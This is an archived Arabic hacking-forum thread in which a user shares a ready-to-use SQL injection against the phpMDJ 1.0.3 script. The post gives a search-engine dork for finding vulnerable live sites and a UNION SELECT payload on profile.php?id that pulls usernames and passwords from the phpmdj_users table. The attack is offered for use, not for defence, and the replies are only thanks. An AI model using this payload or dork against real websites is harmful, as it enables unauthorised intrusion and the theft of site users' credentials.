:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرة في سكريبت phpMDJ 1.0.3 (http://www.vbspiders.com/vb/showthread.php?t=23619)

M!M0 01-11-2010 12:20 AM
ثغرة في سكريبت phpMDJ 1.0.3
 
[align=center]السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
DORKInurl:"profile.php?id 
طريقة الإستغلال

كود PHP:
tp://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1-- 
الثغرة من إكتشاف k4cp3r and Ablus

إن شاء الله تستفيدوا

موفقين بإذن الله ...[/align]

alkingmafia 01-11-2010 01:25 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

T3BaN_HaCkEr 01-11-2010 01:35 AM
اشكرك يا معلم

وااصل ولا تحرمنا من جديدك

iTaChi 01-11-2010 07:57 PM
مشكوووووور

وما قصرت


الساعة الآن 02:26 AM


[ vBspiders.Com Network ]